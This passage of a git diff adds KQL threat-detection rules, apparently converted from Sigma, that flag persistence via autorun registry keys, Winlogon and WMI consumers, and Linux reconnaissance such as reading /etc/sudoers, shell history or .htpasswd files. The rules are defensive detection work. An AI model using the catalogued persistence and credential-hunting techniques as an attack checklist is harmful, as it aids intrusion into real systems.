"C:\\Windows\\servicing\\TrustedInstaller.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql b/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql new file mode 100644 index 00000000..d27ceae5 --- /dev/null +++ b/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql @@ -0,0 +1,12 @@ +// Title: Windows Terminal Profile Settings Modification By Uncommon Process +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-22 +// Level: medium +// Description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.015 +// False Positives: +// - Some false positives may occur with admin scripts that set WT settings. + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and FolderPath endswith "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/winekey_registry_modification.kql b/KQL/rules/Privilege Escalation/winekey_registry_modification.kql new file mode 100644 index 00000000..b75ed32e --- /dev/null +++ b/KQL/rules/Privilege Escalation/winekey_registry_modification.kql @@ -0,0 +1,10 @@ +// Title: WINEKEY Registry Modification +// Author: omkar72 +// Date: 2020-10-30 +// Level: high +// Description: Detects potential malicious modification of run keys by winekey or team9 backdoor +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547 + +DeviceRegistryEvents +| where RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Backup Mgr" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql b/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql new file mode 100644 index 00000000..4304fcd6 --- /dev/null +++ b/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql @@ -0,0 +1,12 @@ +// Title: Winlogon Notify Key Logon Persistence +// Author: frack113 +// Date: 2021-12-30 +// Level: high +// Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. +Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.004 + +DeviceRegistryEvents +| where RegistryValueData endswith ".dll" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\logon" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql b/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql new file mode 100644 index 00000000..36495bef --- /dev/null +++ b/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql @@ -0,0 +1,12 @@ +// Title: WinRAR Creating Files in Startup Locations +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-16 +// Level: high +// Description: Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder. +This kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\WinRAR.exe" or InitiatingProcessFolderPath endswith "\\Rar.exe") and FolderPath contains "\\Start Menu\\Programs\\Startup\\" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql new file mode 100644 index 00000000..832f972c --- /dev/null +++ b/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql @@ -0,0 +1,13 @@ +// Title: WinSock2 Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where RegistryKey contains "\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters" and (RegistryKey contains "\\Protocol_Catalog9\\Catalog_Entries" or RegistryKey contains "\\NameSpace_Catalog5\\Catalog_Entries") and (not((RegistryValueData =~ "(Empty)" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\MsiExec.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\syswow64\\MsiExec.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql b/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql new file mode 100644 index 00000000..db4f03e4 --- /dev/null +++ b/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql @@ -0,0 +1,10 @@ +// Title: WMI Backdoor Exchange Transport Agent +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-11 +// Level: critical +// Description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003 + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\EdgeTransport.exe" and (not((FolderPath =~ "C:\\Windows\\System32\\conhost.exe" or (FolderPath endswith "\\Bin\\OleConverter.exe" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql b/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql new file mode 100644 index 00000000..f19ea27b --- /dev/null +++ b/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql @@ -0,0 +1,12 @@ +// Title: WMI Persistence - Command Line Event Consumer +// Author: Thomas Patzke +// Date: 2018-03-07 +// Level: high +// Description: Detects WMI command line event consumers +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence +// False Positives: +// - Unknown (data set is too small; further testing needed) + +DeviceImageLoadEvents +| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" and FolderPath endswith "\\wbemcons.dll" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql b/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql new file mode 100644 index 00000000..1d2e28ed --- /dev/null +++ b/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql @@ -0,0 +1,12 @@ +// Title: WMI Persistence - Script Event Consumer File Write +// Author: Thomas Patzke +// Date: 2018-03-07 +// Level: high +// Description: Detects file writes of WMI script event consumer +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence +// False Positives: +// - Dell Power Manager (C:\Program Files\Dell\PowerManager\DpmPowerPlanSetup.exe) + +DeviceFileEvents +| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql new file mode 100644 index 00000000..bb60f6e9 --- /dev/null +++ b/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql @@ -0,0 +1,13 @@ +// Title: Wow6432Node Classes Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where RegistryKey contains "\\Software\\Wow6432Node\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\ShellEx\\ColumnHandlers" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers") and (not(RegistryValueData =~ "(Empty)")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql new file mode 100644 index 00000000..2d3ba19d --- /dev/null +++ b/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql @@ -0,0 +1,13 @@ +// Title: Wow6432Node CurrentVersion Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects")) and (not(((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessFolderPath contains "\\setup.exe") or RegistryValueData =~ "(Empty)" or RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-" or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run*") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "\\Explorer\\Browser Helper Objects") or (RegistryValueData endswith " /burn.runonce" and (InitiatingProcessFolderPath contains "\\winsdksetup.exe" or InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" or InitiatingProcessFolderPath contains "\\AspNetCoreSharedFrameworkBundle-") and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\")) or (RegistryValueData endswith "}\\VC_redist.x64.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\VC_redist.x64.exe")))) and (not(((RegistryValueData endswith "instup.exe\" /instop:repair /wait" and InitiatingProcessFolderPath endswith "\\instup.exe" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\AvRepair") or ((RegistryValueData in~ ("{472083B1-C522-11CF-8763-00608CC02F24}", "{472083B0-C522-11CF-8763-00608CC02F24}")) and InitiatingProcessFolderPath endswith "\\instup.exe" and (RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00avg\\(Default)" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00asw\\(Default)")) or (RegistryValueData endswith "\\Avira.OE.Setup.Bundle.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\Avira.OE.Setup.Bundle.exe") or (RegistryValueData endswith "Discord.exe --checkInstall" and RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith ".exe\" /burn.runonce" and RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\" and InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" and (RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}" or RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}")) or (RegistryValueData endswith "-A251-47B7-93E1-CDD82E34AF8B}" or RegistryValueData =~ "grpconv -o" or (RegistryValueData contains "C:\\Program Files" and RegistryValueData contains "\\Dropbox\\Client\\Dropbox.exe" and RegistryValueData contains " /systemstartup")) or RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" and RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) and RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}*") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql new file mode 100644 index 00000000..b85affc9 --- /dev/null +++ b/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql @@ -0,0 +1,13 @@ +// Title: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where ((RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Drivers32") and RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion") and (not((RegistryValueData =~ "(Empty)" or RegistryValueData endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" or isnull(RegistryValueData)))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/writing_local_admin_share.kql b/KQL/rules/Privilege Escalation/writing_local_admin_share.kql new file mode 100644 index 00000000..511889d6 --- /dev/null +++ b/KQL/rules/Privilege Escalation/writing_local_admin_share.kql @@ -0,0 +1,12 @@ +// Title: Writing Local Admin Share +// Author: frack113 +// Date: 2022-01-01 +// Level: medium +// Description: Aversaries may use to interact with a remote network share using Server Message Block (SMB). +This technique is used by post-exploitation frameworks. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.lateral-movement, attack.t1546.002 + +DeviceFileEvents +| where FolderPath contains "\\\\127.0.0" and FolderPath contains "\\ADMIN$\\" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql b/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql new file mode 100644 index 00000000..e9da2e17 --- /dev/null +++ b/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql @@ -0,0 +1,14 @@ +// Title: Xwizard.EXE Execution From Non-Default Location +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-09-20 +// Level: high +// Description: Detects the execution of Xwizard tool from a non-default directory. +When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll". + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Windows installed on non-C drive + +DeviceProcessEvents +| where (FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql b/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql new file mode 100644 index 00000000..f0903e1c --- /dev/null +++ b/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql @@ -0,0 +1,12 @@ +// Title: Access of Sudoers File Content +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights. +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1592.004 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ProcessCommandLine contains " /etc/sudoers" and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/egrep" or FolderPath endswith "/emacs" or FolderPath endswith "/fgrep" or FolderPath endswith "/grep" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail") \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/linux_recon_indicators.kql b/KQL/rules/Reconnaissance/linux_recon_indicators.kql new file mode 100644 index 00000000..2609368d --- /dev/null +++ b/KQL/rules/Reconnaissance/linux_recon_indicators.kql @@ -0,0 +1,12 @@ +// Title: Linux Recon Indicators +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-20 +// Level: high +// Description: Detects events with patterns found in commands used for reconnaissance on linux systems +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1592.004, attack.credential-access, attack.t1552.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ProcessCommandLine contains " -name .htpasswd" or ProcessCommandLine contains " -perm -4000 " \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql b/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql new file mode 100644 index 00000000..c692837f --- /dev/null +++ b/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql @@ -0,0 +1,12 @@ +// Title: Potential Active Directory Enumeration Using AD Module - ProcCreation +// Author: frack113 +// Date: 2023-01-22 +// Level: medium +// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.discovery, attack.impact +// False Positives: +// - Legitimate use of the library for administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ProcessCommandLine contains "Microsoft.ActiveDirectory.Management.dll" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/print_history_file_contents.kql b/KQL/rules/Reconnaissance/print_history_file_contents.kql new file mode 100644 index 00000000..2b58e02d --- /dev/null +++ b/KQL/rules/Reconnaissance/print_history_file_contents.kql @@ -0,0 +1,12 @@ +// Title: Print History File Contents +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1592.004 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (FolderPath endswith "/cat" or FolderPath endswith "/head" or FolderPath endswith "/tail" or FolderPath endswith "/more") and ((ProcessCommandLine contains "/.bash_history" or ProcessCommandLine contains "/.zsh_history") or (ProcessCommandLine endswith "_history" or ProcessCommandLine endswith ".history" or ProcessCommandLine endswith "zhistory")) \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql b/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql new file mode 100644 index 00000000..5a938f7f --- /dev/null +++ b/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql @@ -0,0 +1,10 @@ +// Title: PUA - PingCastle Execution +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2024-01-11 +// Level: medium +// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level. +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1595 + +DeviceProcessEvents +| where ((MD5 startswith "f741f25ac909ee434e50812d436c73ff" or MD5 startswith "d40acbfc29ee24388262e3d8be16f622" or MD5 startswith "01bb2c16fadb992fa66228cd02d45c60" or MD5 startswith "9e1b18e62e42b5444fc55b51e640355b" or MD5 startswith "b7f8fe33ac471b074ca9e630ba0c7e79" or MD5 startswith "324579d717c9b9b8e71d0269d13f811f" or MD5 startswith "63257a1ddaf83cfa43fe24a3bc06c207" or MD5 startswith "049e85963826b059c9bac273bb9c82ab" or MD5 startswith "ecb98b7b4d4427eb8221381154ff4cb2" or MD5 startswith "faf87749ac790ec3a10dd069d10f9d63" or MD5 startswith "f296dba5d21ad18e6990b1992aea8f83" or MD5 startswith "93ba94355e794b6c6f98204cf39f7a11" or MD5 startswith "a258ef593ac63155523a461ecc73bdba" or MD5 startswith "97000eb5d1653f1140ee3f47186463c4" or MD5 startswith "95eb317fbbe14a82bd9fdf31c48b8d93" or MD5 startswith "32fe9f0d2630ac40ea29023920f20f49" or MD5 startswith "a05930dde939cfd02677fc18bb2b7df5" or MD5 startswith "124283924e86933ff9054a549d3a268b" or MD5 startswith "ceda6909b8573fdeb0351c6920225686" or MD5 startswith "60ce120040f2cd311c810ae6f6bbc182" or MD5 startswith "2f10cdc5b09100a260703a28eadd0ceb" or MD5 startswith "011d967028e797a4c16d547f7ba1463f" or MD5 startswith "2da9152c0970500c697c1c9b4a9e0360" or MD5 startswith "b5ba72034b8f44d431f55275bace9f8b" or MD5 startswith "d6ed9101df0f24e27ff92ddab42dacca" or MD5 startswith "3ed3cdb6d12aa1ac562ad185cdbf2d1d" or MD5 startswith "5e083cd0143ae95a6cb79b68c07ca573" or MD5 startswith "28caff93748cb84be70486e79f04c2df" or MD5 startswith "9d4f12c30f9b500f896efd1800e4dd11" or MD5 startswith "4586f7dd14271ad65a5fb696b393f4c0" or MD5 startswith "86ba9dddbdf49215145b5bcd081d4011" or MD5 startswith "9dce0a481343874ef9a36c9a825ef991" or MD5 startswith "85890f62e231ad964b1fda7a674747ec" or MD5 startswith "599be548da6441d7fe3e9a1bb8cb0833" or MD5 startswith "9b0c7fd5763f66e9b8c7b457fce53f96" or MD5 startswith "32d45718164205aec3e98e0223717d1d" or MD5 startswith "6ff5f373ee7f794cd17db50704d00ddb" or MD5 startswith "88efbdf41f0650f8f58a3053b0ca0459" or MD5 startswith "ef915f61f861d1fb7cbde9afd2e7bd93" or MD5 startswith "781fa16511a595757154b4304d2dd350" or MD5 startswith "5018ec39be0e296f4fc8c8575bfa8486" or MD5 startswith "f4a84d6f1caf0875b50135423d04139f") or (SHA1 startswith "9c1431801fa6342ed68f047842b9a11778fc669b" or SHA1 startswith "c36c862f40dad78cb065197aad15fef690c262f2" or SHA1 startswith "bc8e23faea8b3c537f268b3e81d05b937012272d" or SHA1 startswith "12e0357658614ff60d480d1a6709be68a2e40c5f" or SHA1 startswith "18b33ab5719966393d424a3edbfa8dec225d98fa" or SHA1 startswith "f14c9633040897d375e3069fddc71e859f283778" or SHA1 startswith "08041b426c9f112ad2061bf3c8c718e34739d4fc" or SHA1 startswith "7be77c885d0c9a4af4cecc64d512987cf93ba937" or SHA1 startswith "72dbb719b05f89d9d2dbdf186714caf7639daa36" or SHA1 startswith "5b1498beb2cfb4d971e377801e7abce62c0e315b" or SHA1 startswith "292629c6ab33bddf123d26328025e2d157d9e8fc" or SHA1 startswith "be59e621e83a2d4c87b0e6c69a2d22f175408b11" or SHA1 startswith "0250ce9a716ab8cca1c70a9de4cbc49a51934995" or SHA1 startswith "607e1fa810c799735221a609af3bfc405728c02d" or SHA1 startswith "ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3" or SHA1 startswith "044cf5698a8e6b0aeba5acb56567f06366a9a70a" or SHA1 startswith "ef2dea8c736d49607832986c6c2d6fdd68ba6491" or SHA1 startswith "efffc2bfb8af2e3242233db9a7109b903fc3f178" or SHA1 startswith "5a05d4320de9afbc84de8469dd02b3a109efb2d4" or SHA1 startswith "a785d88cf8b862a420b9be793ee6a9616aa94c84" or SHA1 startswith "5688d56cbaf0d934c4e37b112ba257e8fb63f4ea" or SHA1 startswith "5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17" or SHA1 startswith "81d67b3d70c4e855cb11a453cc32997517708362" or SHA1 startswith "9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad" or SHA1 startswith "09c6930d057f49c1c1e11cf9241fffc8c12df3a2" or SHA1 startswith "e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92" or SHA1 startswith "9e3c992415e390f9ada4d15c693b687f38a492d1" or SHA1 startswith "3f34a5ee303d37916584c888c4928e1c1164f92a" or SHA1 startswith "ea4c8c56a8f5c90a4c08366933e5fb2de611d0db" or SHA1 startswith "3150f14508ee4cae19cf09083499d1cda8426540" or SHA1 startswith "036ad9876fa552b1298c040e233d620ea44689c6" or SHA1 startswith "3a3c1dcb146bb4616904157344ce1a82cd173bf5" or SHA1 startswith "6230d6fca973fa26188dfbadede57afb4c15f75c" or SHA1 startswith "8f7b2a9b8842f339b1e33602b7f926ab65de1a4d" or SHA1 startswith "a586bb06b59a4736a47abff8423a54fe8e2c05c4" or SHA1 startswith "c82152cddf9e5df49094686531872ecd545976db" or SHA1 startswith "04c39ffc18533100aaa4f9c06baf2c719ac94a61" or SHA1 startswith "e082affa5cdb2d46452c6601a9e85acb8446b836" or SHA1 startswith "a075bfb6cf5c6451ce682197a87277c8bc188719" or SHA1 startswith "34c0c5839af1c92bce7562b91418443a2044c90d" or SHA1 startswith "74e10a9989e0ec8fe075537ac802bd3031ae7e08" or SHA1 startswith "3a515551814775df0ccbe09f219bc972eae45a10") or (SHA256 startswith "90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b" or SHA256 startswith "5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85" or SHA256 startswith "e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03" or SHA256 startswith "9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795" or SHA256 startswith "7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f" or SHA256 startswith "9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a" or SHA256 startswith "c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275" or SHA256 startswith "1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b" or SHA256 startswith "768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2" or SHA256 startswith "1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae" or SHA256 startswith 